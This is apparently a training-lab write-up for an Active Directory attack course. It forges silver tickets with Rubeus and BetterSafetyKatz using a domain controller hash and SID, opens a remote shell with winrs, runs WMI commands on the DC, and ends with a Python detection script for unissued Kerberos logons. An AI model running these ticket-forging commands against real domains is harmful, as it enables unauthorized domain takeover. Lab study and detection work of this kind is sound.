CRTP Lab 9

Task 1

Try to get command execution on the domain controller by creating a silver ticket for:

  • HTTP

  • WMI

Use the NTLM or AES hash of dcorp-dc to forge and import the ticket.

Here, we use Rubeus for the HTTP service.

# ArgSplit for "silver"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /service:http/dcorp-dc.dollarcorp.moneycorp.local /rc4:4f12be987e9c7419573902752a927164 /sid:S-1-5-21-719815819-3726368948-3917688648 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt

With the ticket imported into the current logon session, we can open a shell on the DC with winrs and execute commands.

C:\AD\Tools>winrs -r:dcorp-dc.dollarcorp.moneycorp.local cmd

C:\Users\Administrator>set username
set username
USERNAME=Administrator

C:\Users\Administrator>set computername
set computername
COMPUTERNAME=DCORP-DC

Let's also use BetterSafetyKatz for WMI.

To access WMI (which rides on DCOM), we need two tickets: one for the HOST service and another for RPCSS.

Let's get one for HOST first:

C:\AD\Tools> C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

Now for RPCSS:

C:\AD\Tools> C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /target:dcorp-dc.dollarcorp.moneycorp.local  /service:RPCSS /rc4:c6a60b67476b36ad7838d7875c33c2c3 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"

We can now check that both tickets are imported using klist:

klist

We can now run WMI commands on the DC.

# Run InviShell
C:\Windows\system32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

# Run WMI command on DC
PS C:\AD\Tools> Get-WmiObject -Class win32_operatingsystem -ComputerName dcorp-dc
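As an added defender-side example (not part of the lab notes): a silver ticket is forged offline from the service account key and never issued by the KDC, so the DC logs no 4769 for it while the target host still logs a 4624 Kerberos network logon. The Python below runs that correlation over constructed sample events; the field names, account names, timestamps and the 10-hour window (the default service ticket lifetime) are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Field names follow the Windows
# Security log: 4769 on the DC (service ticket issued), 4624 on the target host.
DC_TGS_EVENTS = [
    {"EventID": 4769, "TimeCreated": "2024-05-01T09:00:00", "IpAddress": "172.16.100.10",
     "TargetUserName": "bob@DOLLARCORP.MONEYCORP.LOCAL", "ServiceName": "DCORP-DC$"},
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:00:00", "IpAddress": "172.16.100.10",
     "TargetUserName": "alice@DOLLARCORP.MONEYCORP.LOCAL", "ServiceName": "DCORP-ADMINSRV$"},
]
DCORP_DC_LOGONS = [
    {"EventID": 4624, "TimeCreated": "2024-05-01T09:00:05", "IpAddress": "172.16.100.10",
     "TargetUserName": "bob", "LogonType": "3", "AuthenticationPackageName": "Kerberos"},
    {"EventID": 4624, "TimeCreated": "2024-05-01T10:00:05", "IpAddress": "172.16.100.10",
     "TargetUserName": "alice", "LogonType": "3", "AuthenticationPackageName": "Kerberos"},
    {"EventID": 4624, "TimeCreated": "2024-05-01T11:30:00", "IpAddress": "172.16.100.10",
     "TargetUserName": "Administrator", "LogonType": "3", "AuthenticationPackageName": "Kerberos"},
    {"EventID": 4624, "TimeCreated": "2024-05-01T11:31:00", "IpAddress": "172.16.100.10",
     "TargetUserName": "svc-backup", "LogonType": "3", "AuthenticationPackageName": "NTLM"},
]

def _when(event):
    return datetime.fromisoformat(event["TimeCreated"])

def unissued_kerberos_logons(dc_events, host_logons, host_account,
                             window=timedelta(hours=10), skew=timedelta(minutes=5)):
    """Return Kerberos network logons to host_account that no DC-issued ticket explains.
    A silver ticket is built offline from the service account key, so the KDC never
    logs a 4769 for it; a genuine ticket has a 4769 within its lifetime (10 h default).
    """
    issued = [e for e in dc_events
              if e["EventID"] == 4769 and e["ServiceName"].upper() == host_account.upper()]
    flagged = []
    for logon in host_logons:
        if (logon["EventID"] != 4624 or logon["LogonType"] != "3"
                or logon["AuthenticationPackageName"] != "Kerberos"):
            continue  # only Kerberos network logons can stem from a forged service ticket
        user, seen = logon["TargetUserName"].lower(), _when(logon)
        explained = any(e["TargetUserName"].split("@")[0].lower() == user
                        and seen - window <= _when(e) <= seen + skew for e in issued)
        if not explained:
            flagged.append(logon)
    return flagged

if __name__ == "__main__":
    for e in unissued_kerberos_logons(DC_TGS_EVENTS, DCORP_DC_LOGONS, "DCORP-DC$"):
        print(f"{e['TimeCreated']} {e['TargetUserName']} from {e['IpAddress']}: "
              "Kerberos logon with no matching 4769 on the DC")
```

In a domain with several DCs the 4769 events must be collected from all of them, and a ticket cached from an earlier request can legitimately be used late in its lifetime, so treat a hit as a lead to confirm against the PAC and the source host rather than as proof on its own.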
